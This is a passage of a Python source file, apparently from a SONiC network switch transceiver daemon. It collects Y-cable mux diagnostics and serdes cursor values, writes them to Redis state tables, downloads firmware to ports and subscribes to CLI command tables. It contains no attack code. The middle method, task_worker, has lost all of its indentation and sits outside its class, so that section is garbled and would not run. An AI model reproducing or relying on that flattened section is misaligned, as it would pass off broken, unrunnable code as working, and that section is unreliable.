        mux_info_dict["internal_temperature"] = "N/A"
    with y_cable_port_locks[physical_port]:
        try:
            res = port_instance.get_local_voltage()
        except Exception as e:
            res = None
            helper_logger.log_warning("Failed to execute the get_local_voltage for port {} due to {}".format(physical_port,repr(e)))
    if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, float):
        mux_info_dict["internal_voltage"] = res
    else:
        mux_info_dict["internal_voltage"] = "N/A"
    with y_cable_port_locks[physical_port]:
        try:
            res = port_instance.get_nic_voltage()
        except Exception as e:
            res = None
            helper_logger.log_warning("Failed to execute the get_nic_voltage for port {} due to {}".format(physical_port,repr(e)))
    if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, float):
        mux_info_dict["nic_voltage"] = res
    else:
        mux_info_dict["nic_voltage"] = "N/A"
    with y_cable_port_locks[physical_port]:
        try:
            res = port_instance.get_nic_temperature()
        except Exception as e:
            res = None
            helper_logger.log_warning("Failed to execute the get_nic_temperature for port {} due to {}".format(physical_port,repr(e)))
    if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, int) and res >= 0:
        mux_info_dict["nic_temperature"] = res
    else:
        mux_info_dict["nic_temperature"] = "N/A"
    return mux_info_dict
def get_muxcable_static_info(physical_port, logical_port_name, port_mapping):
    """Collect static mux-cable info for one Y-cable port.

    Reads the port's read side from the HW_MUX_CABLE state-DB entry and the
    per-lane serdes cursor values (5 values per lane, lanes 1-2) for the
    NIC, ToR-A and ToR-B targets from the transceiver, returning them as a
    flat dict keyed by the MUX_CABLE_STATIC_INFO field names.

    Returns:
        dict of field name -> value, or -1 when the port instance or its
        state-DB entry cannot be retrieved.
    """
    mux_static_info_dict = {}
    y_cable_tbl, state_db = {}, {}
    port_instance = y_cable_port_instances.get(physical_port)
    if port_instance is None:
        helper_logger.log_error("Error: Could not get port instance for muxcable info for Y cable port {}".format(logical_port_name))
        return -1
    namespaces = multi_asic.get_front_end_namespaces()
    for namespace in namespaces:
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
        y_cable_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
    asic_index = port_mapping.get_asic_id_for_logical_port(
        logical_port_name)
    if asic_index is None:
        helper_logger.log_warning(
            "Got invalid asic index for {}, ignored".format(logical_port_name))
        return -1
    (status, fvs) = y_cable_tbl[asic_index].get(logical_port_name)
    if status is False:
        helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(
            logical_port_name, y_cable_tbl[asic_index].getTableName()))
        return -1
    mux_port_dict = dict(fvs)
    read_side = int(mux_port_dict.get("read_side"))
    if read_side == 1:
        mux_static_info_dict["read_side"] = "tor1"
    else:
        mux_static_info_dict["read_side"] = "tor2"
    # placeholder cursor row reported when a hardware read fails
    dummy_list = ["N/A", "N/A", "N/A", "N/A", "N/A"]
    cursor_nic_values = []
    cursor_tor1_values = []
    cursor_tor2_values = []
    # gather the 5 cursor values for lanes 1 and 2, per target
    for i in range(1, 3):
        try:
            cursor_values_nic = port_instance.get_target_cursor_values(i, port_instance.TARGET_NIC)
        except Exception as e:
            cursor_values_nic = None
            helper_logger.log_warning("Failed to execute the get_target_cursor_value NIC for port {} due to {}".format(physical_port,repr(e)))
        if cursor_values_nic is not None and cursor_values_nic is not port_instance.EEPROM_ERROR and isinstance(cursor_values_nic, list):
            cursor_nic_values.append(cursor_values_nic)
        else:
            cursor_nic_values.append(dummy_list)
        try:
            cursor_values_tor1 = port_instance.get_target_cursor_values(i, port_instance.TARGET_TOR_A)
        except Exception as e:
            cursor_values_tor1 = None
            helper_logger.log_warning("Failed to execute the get_target_cursor_value ToR 1 for port {} due to {}".format(physical_port,repr(e)))
        if cursor_values_tor1 is not None and cursor_values_tor1 is not port_instance.EEPROM_ERROR and isinstance(cursor_values_tor1, list):
            cursor_tor1_values.append(cursor_values_tor1)
        else:
            cursor_tor1_values.append(dummy_list)
        try:
            cursor_values_tor2 = port_instance.get_target_cursor_values(i, port_instance.TARGET_TOR_B)
        except Exception as e:
            cursor_values_tor2 = None
            helper_logger.log_warning("Failed to execute the get_target_cursor_value ToR 2 for port {} due to {}".format(physical_port,repr(e)))
        if cursor_values_tor2 is not None and cursor_values_tor2 is not port_instance.EEPROM_ERROR and isinstance(cursor_values_tor2, list):
            cursor_tor2_values.append(cursor_values_tor2)
        else:
            cursor_tor2_values.append(dummy_list)
    for i in range(1, 3):
        mux_static_info_dict[("nic_lane{}_precursor1".format(i))] = cursor_nic_values[i-1][0]
        mux_static_info_dict[("nic_lane{}_precursor2".format(i))] = cursor_nic_values[i-1][1]
        mux_static_info_dict[("nic_lane{}_maincursor".format(i))] = cursor_nic_values[i-1][2]
        mux_static_info_dict[("nic_lane{}_postcursor1".format(i))] = cursor_nic_values[i-1][3]
        mux_static_info_dict[("nic_lane{}_postcursor2".format(i))] = cursor_nic_values[i-1][4]
    # map ToR-A/ToR-B cursor rows to self/peer depending on which side we read from
    if read_side == 1:
        for i in range(1, 3):
            mux_static_info_dict[("tor_self_lane{}_precursor1".format(i))] = cursor_tor1_values[i-1][0]
            mux_static_info_dict[("tor_self_lane{}_precursor2".format(i))] = cursor_tor1_values[i-1][1]
            mux_static_info_dict[("tor_self_lane{}_maincursor".format(i))] = cursor_tor1_values[i-1][2]
            mux_static_info_dict[("tor_self_lane{}_postcursor1".format(i))] = cursor_tor1_values[i-1][3]
            mux_static_info_dict[("tor_self_lane{}_postcursor2".format(i))] = cursor_tor1_values[i-1][4]
        for i in range(1, 3):
            mux_static_info_dict[("tor_peer_lane{}_precursor1".format(i))] = cursor_tor2_values[i-1][0]
            mux_static_info_dict[("tor_peer_lane{}_precursor2".format(i))] = cursor_tor2_values[i-1][1]
            mux_static_info_dict[("tor_peer_lane{}_maincursor".format(i))] = cursor_tor2_values[i-1][2]
            mux_static_info_dict[("tor_peer_lane{}_postcursor1".format(i))] = cursor_tor2_values[i-1][3]
            mux_static_info_dict[("tor_peer_lane{}_postcursor2".format(i))] = cursor_tor2_values[i-1][4]
    else:
        for i in range(1, 3):
            mux_static_info_dict[("tor_self_lane{}_precursor1".format(i))] = cursor_tor2_values[i-1][0]
            mux_static_info_dict[("tor_self_lane{}_precursor2".format(i))] = cursor_tor2_values[i-1][1]
            mux_static_info_dict[("tor_self_lane{}_maincursor".format(i))] = cursor_tor2_values[i-1][2]
            mux_static_info_dict[("tor_self_lane{}_postcursor1".format(i))] = cursor_tor2_values[i-1][3]
            mux_static_info_dict[("tor_self_lane{}_postcursor2".format(i))] = cursor_tor2_values[i-1][4]
        for i in range(1, 3):
            mux_static_info_dict[("tor_peer_lane{}_precursor1".format(i))] = cursor_tor1_values[i-1][0]
            mux_static_info_dict[("tor_peer_lane{}_precursor2".format(i))] = cursor_tor1_values[i-1][1]
            mux_static_info_dict[("tor_peer_lane{}_maincursor".format(i))] = cursor_tor1_values[i-1][2]
            mux_static_info_dict[("tor_peer_lane{}_postcursor1".format(i))] = cursor_tor1_values[i-1][3]
            mux_static_info_dict[("tor_peer_lane{}_postcursor2".format(i))] = cursor_tor1_values[i-1][4]
    return mux_static_info_dict
def post_port_mux_info_to_db(logical_port_name, port_mapping, table):
    """Post live mux-cable info for *logical_port_name* into state-DB *table*.

    Collects diagnostics via get_muxcable_info() and writes them as
    field/value pairs keyed by the logical port name.

    Returns:
        -1 when the physical port lookup or info collection fails;
        otherwise None (success, or port not present).
    """
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
    if physical_port_list is None:
        helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
        return -1
    if len(physical_port_list) > 1:
        helper_logger.log_warning("Error: Retreived multiple ports for a Y cable port {}".format(logical_port_name))
        return -1
    for physical_port in physical_port_list:
        if not y_cable_wrapper_get_presence(physical_port):
            helper_logger.log_warning("Error: trying to post mux info without presence of port {}".format(logical_port_name))
            continue
        mux_info_dict = get_muxcable_info(physical_port, logical_port_name, port_mapping)
        # Fix: use != instead of 'is not' — identity comparison against an int
        # literal is implementation-defined (SyntaxWarning on CPython >= 3.8)
        if mux_info_dict is not None and mux_info_dict != -1:
            #transceiver_dict[physical_port] = port_info_dict
            fvs = swsscommon.FieldValuePairs(
                [('tor_active', mux_info_dict["tor_active"]),
                 ('mux_direction', str(mux_info_dict["mux_direction"])),
                 ('manual_switch_count', str(mux_info_dict["manual_switch_count"])),
                 ('auto_switch_count', str(mux_info_dict["auto_switch_count"])),
                 ('link_status_self', mux_info_dict["link_status_self"]),
                 ('link_status_peer', mux_info_dict["link_status_peer"]),
                 ('link_status_nic', mux_info_dict["link_status_nic"]),
                 ('self_eye_height_lane1', str(mux_info_dict["self_eye_height_lane1"])),
                 ('self_eye_height_lane2', str(mux_info_dict["self_eye_height_lane2"])),
                 ('peer_eye_height_lane1', str(mux_info_dict["peer_eye_height_lane1"])),
                 # Fix: was copy-pasted from lane1 — lane2 value was never published
                 ('peer_eye_height_lane2', str(mux_info_dict["peer_eye_height_lane2"])),
                 ('nic_eye_height_lane1', str(mux_info_dict["nic_eye_height_lane1"])),
                 ('nic_eye_height_lane2', str(mux_info_dict["nic_eye_height_lane2"])),
                 ('internal_temperature', str(mux_info_dict["internal_temperature"])),
                 ('internal_voltage', str(mux_info_dict["internal_voltage"])),
                 ('nic_temperature', str(mux_info_dict["nic_temperature"])),
                 ('nic_voltage', str(mux_info_dict["nic_voltage"])),
                 ('version_self_active', str(mux_info_dict["version_self_active"])),
                 ('version_self_inactive', str(mux_info_dict["version_self_inactive"])),
                 ('version_self_next', str(mux_info_dict["version_self_next"])),
                 ('version_peer_active', str(mux_info_dict["version_peer_active"])),
                 ('version_peer_inactive', str(mux_info_dict["version_peer_inactive"])),
                 ('version_peer_next', str(mux_info_dict["version_peer_next"])),
                 ('version_nic_active', str(mux_info_dict["version_nic_active"])),
                 ('version_nic_inactive', str(mux_info_dict["version_nic_inactive"])),
                 ('version_nic_next', str(mux_info_dict["version_nic_next"]))
                 ])
            table.set(logical_port_name, fvs)
        else:
            return -1
def post_port_mux_static_info_to_db(logical_port_name, port_mapping, static_table):
    """Post static mux-cable info for *logical_port_name* into *static_table*.

    Collects read-side and serdes cursor values via
    get_muxcable_static_info() and writes them as field/value pairs keyed
    by the logical port name.

    Returns:
        -1 when the physical port lookup or info collection fails;
        otherwise None (success, or port not present).
    """
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
    if physical_port_list is None:
        helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
        return -1
    if len(physical_port_list) > 1:
        helper_logger.log_warning(
            "Error: Retreived multiple ports for a Y cable port {}".format(logical_port_name))
        return -1
    for physical_port in physical_port_list:
        if not y_cable_wrapper_get_presence(physical_port):
            continue
        mux_static_info_dict = get_muxcable_static_info(physical_port, logical_port_name, port_mapping)
        # Fix: use != instead of 'is not' — identity comparison against an int
        # literal is implementation-defined (SyntaxWarning on CPython >= 3.8)
        if mux_static_info_dict is not None and mux_static_info_dict != -1:
            #transceiver_dict[physical_port] = port_info_dict
            fvs = swsscommon.FieldValuePairs(
                [('read_side', mux_static_info_dict["read_side"]),
                 ('nic_lane1_precursor1', str(mux_static_info_dict["nic_lane1_precursor1"])),
                 ('nic_lane1_precursor2', str(mux_static_info_dict["nic_lane1_precursor2"])),
                 ('nic_lane1_maincursor', str(mux_static_info_dict["nic_lane1_maincursor"])),
                 ('nic_lane1_postcursor1', str(mux_static_info_dict["nic_lane1_postcursor1"])),
                 ('nic_lane1_postcursor2', str(mux_static_info_dict["nic_lane1_postcursor2"])),
                 ('nic_lane2_precursor1', str(mux_static_info_dict["nic_lane2_precursor1"])),
                 ('nic_lane2_precursor2', str(mux_static_info_dict["nic_lane2_precursor2"])),
                 ('nic_lane2_maincursor', str(mux_static_info_dict["nic_lane2_maincursor"])),
                 ('nic_lane2_postcursor1', str(mux_static_info_dict["nic_lane2_postcursor1"])),
                 ('nic_lane2_postcursor2', str(mux_static_info_dict["nic_lane2_postcursor2"])),
                 ('tor_self_lane1_precursor1', str(mux_static_info_dict["tor_self_lane1_precursor1"])),
                 ('tor_self_lane1_precursor2', str(mux_static_info_dict["tor_self_lane1_precursor2"])),
                 ('tor_self_lane1_maincursor', str(mux_static_info_dict["tor_self_lane1_maincursor"])),
                 ('tor_self_lane1_postcursor1', str(mux_static_info_dict["tor_self_lane1_postcursor1"])),
                 ('tor_self_lane1_postcursor2', str(mux_static_info_dict["tor_self_lane1_postcursor2"])),
                 ('tor_self_lane2_precursor1', str(mux_static_info_dict["tor_self_lane2_precursor1"])),
                 ('tor_self_lane2_precursor2', str(mux_static_info_dict["tor_self_lane2_precursor2"])),
                 ('tor_self_lane2_maincursor', str(mux_static_info_dict["tor_self_lane2_maincursor"])),
                 ('tor_self_lane2_postcursor1', str(mux_static_info_dict["tor_self_lane2_postcursor1"])),
                 ('tor_self_lane2_postcursor2', str(mux_static_info_dict["tor_self_lane2_postcursor2"])),
                 ('tor_peer_lane1_precursor1', str(mux_static_info_dict["tor_peer_lane1_precursor1"])),
                 ('tor_peer_lane1_precursor2', str(mux_static_info_dict["tor_peer_lane1_precursor2"])),
                 ('tor_peer_lane1_maincursor', str(mux_static_info_dict["tor_peer_lane1_maincursor"])),
                 ('tor_peer_lane1_postcursor1', str(mux_static_info_dict["tor_peer_lane1_postcursor1"])),
                 ('tor_peer_lane1_postcursor2', str(mux_static_info_dict["tor_peer_lane1_postcursor2"])),
                 ('tor_peer_lane2_precursor1', str(mux_static_info_dict["tor_peer_lane2_precursor1"])),
                 ('tor_peer_lane2_precursor2', str(mux_static_info_dict["tor_peer_lane2_precursor2"])),
                 ('tor_peer_lane2_maincursor', str(mux_static_info_dict["tor_peer_lane2_maincursor"])),
                 ('tor_peer_lane2_postcursor1', str(mux_static_info_dict["tor_peer_lane2_postcursor1"])),
                 ('tor_peer_lane2_postcursor2', str(mux_static_info_dict["tor_peer_lane2_postcursor2"]))
                 ])
            static_table.set(logical_port_name, fvs)
        else:
            return -1
def post_mux_static_info_to_db(is_warm_start, port_mapping, stop_event=threading.Event()):
    """Post static mux info for every logical port to the state DB.

    Builds one MUX_CABLE_STATIC_INFO table handle per front-end namespace,
    then posts static info for each logical port, honoring *stop_event*.
    """
    # Connect to STATE_DB and create transceiver mux/static info tables
    state_db = {}
    static_tbl = {}
    for ns in multi_asic.get_front_end_namespaces():
        ns_asic_id = multi_asic.get_asic_index_from_namespace(ns)
        state_db[ns_asic_id] = daemon_base.db_connect("STATE_DB", ns)
        static_tbl[ns_asic_id] = swsscommon.Table(state_db[ns_asic_id], MUX_CABLE_STATIC_INFO_TABLE)
    # Post all the current interface dom/sfp info to STATE_DB
    for logical_port_name in port_mapping.logical_port_list:
        if stop_event.is_set():
            break
        # Get the asic to which this port belongs
        asic_index = port_mapping.get_asic_id_for_logical_port(logical_port_name)
        if asic_index is None:
            helper_logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
            continue
        post_port_mux_static_info_to_db(logical_port_name, port_mapping, static_tbl[asic_index])
def post_mux_info_to_db(is_warm_start, port_mapping, stop_event=threading.Event()):
    """Post live mux info for every logical port to the state DB.

    Builds one MUX_CABLE_INFO table handle per front-end namespace, then
    posts dynamic mux info for each logical port, honoring *stop_event*.
    """
    # Connect to STATE_DB and create transceiver mux info tables
    # (removed unused static_tbl local — it was declared but never populated)
    state_db, mux_tbl = {}, {}
    # Get the namespaces in the platform
    namespaces = multi_asic.get_front_end_namespaces()
    for namespace in namespaces:
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
        mux_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], MUX_CABLE_INFO_TABLE)
    # Post all the current interface dom/sfp info to STATE_DB
    logical_port_list = port_mapping.logical_port_list
    for logical_port_name in logical_port_list:
        if stop_event.is_set():
            break
        # Get the asic to which this port belongs
        asic_index = port_mapping.get_asic_id_for_logical_port(logical_port_name)
        if asic_index is None:
            helper_logger.log_warning(
                "Got invalid asic index for {}, ignored".format(logical_port_name))
            continue
        post_port_mux_info_to_db(logical_port_name, port_mapping, mux_tbl[asic_index])
def task_download_firmware_worker(port, physical_port, port_instance, file_full_path, xcvrd_down_fw_rsp_tbl, xcvrd_down_fw_cmd_sts_tbl, rc):
    """Worker-thread body that downloads firmware to one physical port.

    Records the download status in the response/command-status tables and
    in rc[0] (-1 on failure) so the spawning thread can observe the result.
    """
    helper_logger.log_debug("worker thread launched for downloading physical port {} path {}".format(physical_port, file_full_path))
    download_status = -1
    try:
        download_status = port_instance.download_firmware(file_full_path)
        # brief settle time after the vendor API returns
        time.sleep(5)
    except Exception as exc:
        download_status = -1
        helper_logger.log_warning("Failed to execute the download firmware API for port {} due to {}".format(physical_port,repr(exc)))
    set_result_and_delete_port('status', download_status, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, port)
    helper_logger.log_debug(" downloading complete {} {} {}".format(physical_port, file_full_path, download_status))
    rc[0] = download_status
    helper_logger.log_debug("download thread finished port {} physical_port {}".format(port, physical_port))
# Thread wrapper class to update y_cable status periodically
class YCableTableUpdateTask(object):
    def __init__(self, port_mapping):
        """Initialize task bookkeeping and snapshot the port mapping.

        Args:
            port_mapping: port-mapping object; deep-copied so this task
                keeps its own independent copy.
        """
        # Worker/CLI thread handles; populated later by the task entry points
        self.task_thread = None
        self.task_cli_thread = None
        # per-port firmware-download threads, keyed elsewhere in this class
        self.task_download_firmware_thread = {}
        self.task_stopping_event = threading.Event()
        self.port_mapping = copy.deepcopy(port_mapping)
        if multi_asic.is_multi_asic():
            # Load the namespace details first from the database_global.json file.
            swsscommon.SonicDBConfig.initializeGlobalConfig()
def task_worker(self):
# Connect to STATE_DB and APPL_DB and get both the HW_MUX_STATUS_TABLE info
appl_db, state_db, config_db, status_tbl, y_cable_tbl = {}, {}, {}, {}, {}
y_cable_tbl_keys = {}
mux_cable_command_tbl, y_cable_command_tbl = {}, {}
mux_metrics_tbl = {}
asic_context = {}
sel = swsscommon.Select()
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
# Open a handle to the Application database, in all namespaces
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
status_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], swsscommon.APP_HW_MUX_CABLE_TABLE_NAME)
mux_cable_command_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], swsscommon.APP_MUX_CABLE_COMMAND_TABLE_NAME)
y_cable_command_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], swsscommon.APP_MUX_CABLE_COMMAND_TABLE_NAME)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
mux_metrics_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_MUX_METRICS_TABLE_NAME)
y_cable_tbl_keys[asic_id] = y_cable_tbl[asic_id].getKeys()
port_tbl = swsscommon.SubscriberStateTable(config_db[asic_id], swsscommon.CFG_PORT_TABLE_NAME)
asic_context[port_tbl] = asic_id
sel.addSelectable(status_tbl[asic_id])
sel.addSelectable(mux_cable_command_tbl[asic_id])
sel.addSelectable(port_tbl)
# Listen indefinitely for changes to the HW_MUX_CABLE_TABLE in the Application DB's
while True:
# Use timeout to prevent ignoring the signals we want to handle
# in signal_handler() (e.g. SIGTERM for graceful shutdown)
if self.task_stopping_event.is_set():
break
(state, selectableObj) = sel.select(SELECT_TIMEOUT)
if state == swsscommon.Select.TIMEOUT:
# Do not flood log when select times out
continue
if state != swsscommon.Select.OBJECT:
helper_logger.log_warning(
"sel.select() did not return swsscommon.Select.OBJECT for sonic_y_cable updates")
continue
# Get the redisselect object from selectable object
redisSelectObj = swsscommon.CastSelectableToRedisSelectObj(
selectableObj)
# Get the corresponding namespace from redisselect db connector object
namespace = redisSelectObj.getDbConnector().getNamespace()
asic_index = multi_asic.get_asic_index_from_namespace(namespace)
read_port_config_change(asic_context, self.port_mapping, helper_logger, self.port_mapping.handle_port_change_event)
while True:
(port, op, fvp) = status_tbl[asic_index].pop()
if not port:
break
helper_logger.log_debug("Y_CABLE_DEBUG: received an event for port transition {} {}".format(port, threading.currentThread().getName()))
# entering this section signifies a start for xcvrd state
# change request from swss so initiate recording in mux_metrics table
time_start = datetime.datetime.utcnow().strftime("%Y-%b-%d %H:%M:%S.%f")
if fvp:
# This check might be redundant, to check, the presence of this Port in keys
# in logical_port_list but keep for now for coherency
# also skip checking in logical_port_list inside sfp_util
if port not in y_cable_tbl_keys[asic_index]:
continue
fvp_dict = dict(fvp)
if "state" in fvp_dict:
# got a state change
new_status = fvp_dict["state"]
(status, fvs) = y_cable_tbl[asic_index].get(port)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(
port, y_cable_tbl[asic_index].getTableName()))
continue
mux_port_dict = dict(fvs)
old_status = mux_port_dict.get("state")
read_side = mux_port_dict.get("read_side")
# Now whatever is the state requested, toggle the mux appropriately
helper_logger.log_debug("Y_CABLE_DEBUG: xcvrd trying to transition port {} from {} to {}".format(port, old_status, new_status))
active_side = update_tor_active_side(read_side, new_status, port, self.port_mapping)
if active_side == -1:
helper_logger.log_warning("ERR: Got a change event for toggle but could not toggle the mux-direction for port {} state from {} to {}, writing unknown".format(
port, old_status, new_status))
new_status = 'unknown'
helper_logger.log_debug("Y_CABLE_DEBUG: xcvrd successful to transition port {} from {} to {} and write back to the DB {}".format(port, old_status, new_status, threading.currentThread().getName()))
helper_logger.log_notice("Got a change event for toggle the mux-direction active side for port {} state from {} to {} {}".format(
port, old_status, new_status, threading.currentThread().getName()))
time_end = datetime.datetime.utcnow().strftime("%Y-%b-%d %H:%M:%S.%f")
fvs_metrics = swsscommon.FieldValuePairs([('xcvrd_switch_{}_start'.format(new_status), str(time_start)),
('xcvrd_switch_{}_end'.format(new_status), str(time_end))])
mux_metrics_tbl[asic_index].set(port, fvs_metrics)
fvs_updated = swsscommon.FieldValuePairs([('state', new_status),
('read_side', read_side),
('active_side', str(active_side))])
y_cable_tbl[asic_index].set(port, fvs_updated)
else:
helper_logger.log_info("Got a change event on port {} of table {} that does not contain state".format(
port, swsscommon.APP_HW_MUX_CABLE_TABLE_NAME))
while True:
(port_m, op_m, fvp_m) = mux_cable_command_tbl[asic_index].pop()
if not port_m:
break
helper_logger.log_debug("Y_CABLE_DEBUG: received a probe for port status {} {}".format(port_m, threading.currentThread().getName()))
if fvp_m:
if port_m not in y_cable_tbl_keys[asic_index]:
continue
fvp_dict = dict(fvp_m)
if "command" in fvp_dict:
# check if xcvrd got a probe command
probe_identifier = fvp_dict["command"]
if probe_identifier == "probe":
(status, fv) = y_cable_tbl[asic_index].get(port_m)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(
port_m, y_cable_tbl[asic_index].getTableName()))
continue
mux_port_dict = dict(fv)
read_side = mux_port_dict.get("read_side")
update_appdb_port_mux_cable_response_table(port_m, self.port_mapping, asic_index, appl_db, int(read_side))
def task_cli_worker(self):
    """Service mux-cable CLI requests delivered through redis command tables.

    Subscribes, per front-end ASIC namespace, to the XCVRD_* command tables
    in APPL_DB (and XCVRD_LOG in CONFIG_DB) and loops until
    self.task_stopping_event is set, handling:
      - XCVRD_LOG: raise/lower helper_logger verbosity
      - show/config mux hwmode muxdirection and switchmode
      - firmware download / show / activate / rollback
    Each result is published to the corresponding *_RSP (and *_RES) table
    via set_result_and_delete_port().

    Fixes applied in review (marked BUGFIX below):
      - `is` identity comparisons replaced with `==` equality
      - undefined table name xcvrd_show_hwmode_state_cmd_sts_tbl (NameError)
      - missing self.port_mapping argument in one port-instance lookup
      - activate/rollback error responses written to the wrong tables
      - missing `break` after a port-instance failure in the rollback loop
    """
    # Connect to STATE_DB and APPL_DB and get both the HW_MUX_STATUS_TABLE info
    # NOTE: the original also initialized an unused y_cable_tbl dict; dropped.
    appl_db, config_db, state_db = {}, {}, {}
    xcvrd_log_tbl = {}
    xcvrd_down_fw_cmd_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_down_fw_cmd_sts_tbl = {}, {}, {}
    xcvrd_down_fw_status_cmd_tbl, xcvrd_down_fw_status_rsp_tbl, xcvrd_down_fw_status_cmd_sts_tbl = {}, {}, {}
    xcvrd_acti_fw_cmd_tbl, xcvrd_acti_fw_rsp_tbl, xcvrd_acti_fw_cmd_sts_tbl = {}, {}, {}
    xcvrd_roll_fw_cmd_tbl, xcvrd_roll_fw_rsp_tbl, xcvrd_roll_fw_cmd_sts_tbl = {}, {}, {}
    xcvrd_show_fw_cmd_tbl, xcvrd_show_fw_rsp_tbl, xcvrd_show_fw_cmd_sts_tbl, xcvrd_show_fw_res_tbl = {}, {}, {}, {}
    xcvrd_show_hwmode_dir_cmd_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_cmd_sts_tbl = {}, {}, {}
    xcvrd_show_hwmode_swmode_cmd_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, xcvrd_show_hwmode_swmode_cmd_sts_tbl = {}, {}, {}
    xcvrd_config_hwmode_state_cmd_tbl, xcvrd_config_hwmode_state_rsp_tbl, xcvrd_config_hwmode_state_cmd_sts_tbl = {}, {}, {}
    xcvrd_config_hwmode_swmode_cmd_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, xcvrd_config_hwmode_swmode_cmd_sts_tbl = {}, {}, {}

    sel = swsscommon.Select()

    # Get the namespaces in the platform
    namespaces = multi_asic.get_front_end_namespaces()
    for namespace in namespaces:
        # Open a handle to the Application database, in all namespaces
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
        config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
        state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
        # For each command there are up to three tables:
        #   *_cmd_tbl      (SubscriberStateTable) — incoming CLI requests
        #   *_cmd_sts_tbl  (Table on the same APPL_DB table) — used to clear the request
        #   *_rsp_tbl / *_res_tbl (STATE_DB) — response / result payload
        xcvrd_log_tbl[asic_id] = swsscommon.SubscriberStateTable(
            config_db[asic_id], "XCVRD_LOG")
        xcvrd_show_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_SHOW_FW_CMD")
        xcvrd_show_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_SHOW_FW_CMD")
        xcvrd_show_fw_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_SHOW_FW_RSP")
        xcvrd_show_fw_res_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_SHOW_FW_RES")
        xcvrd_down_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_DOWN_FW_CMD")
        xcvrd_down_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_DOWN_FW_CMD")
        xcvrd_down_fw_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_DOWN_FW_RSP")
        xcvrd_down_fw_status_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_DOWN_FW_STATUS_CMD")
        xcvrd_down_fw_status_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_DOWN_FW_STATUS_RSP")
        xcvrd_acti_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_ACTI_FW_CMD")
        xcvrd_acti_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_ACTI_FW_CMD")
        xcvrd_acti_fw_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_ACTI_FW_RSP")
        xcvrd_roll_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_ROLL_FW_CMD")
        xcvrd_roll_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_ROLL_FW_CMD")
        xcvrd_roll_fw_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_ROLL_FW_RSP")
        xcvrd_show_hwmode_dir_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_SHOW_HWMODE_DIR_CMD")
        xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_SHOW_HWMODE_DIR_CMD")
        xcvrd_show_hwmode_dir_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_SHOW_HWMODE_DIR_RSP")
        xcvrd_config_hwmode_state_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_CONFIG_HWMODE_DIR_CMD")
        xcvrd_config_hwmode_state_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_CONFIG_HWMODE_DIR_CMD")
        xcvrd_config_hwmode_state_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_CONFIG_HWMODE_DIR_RSP")
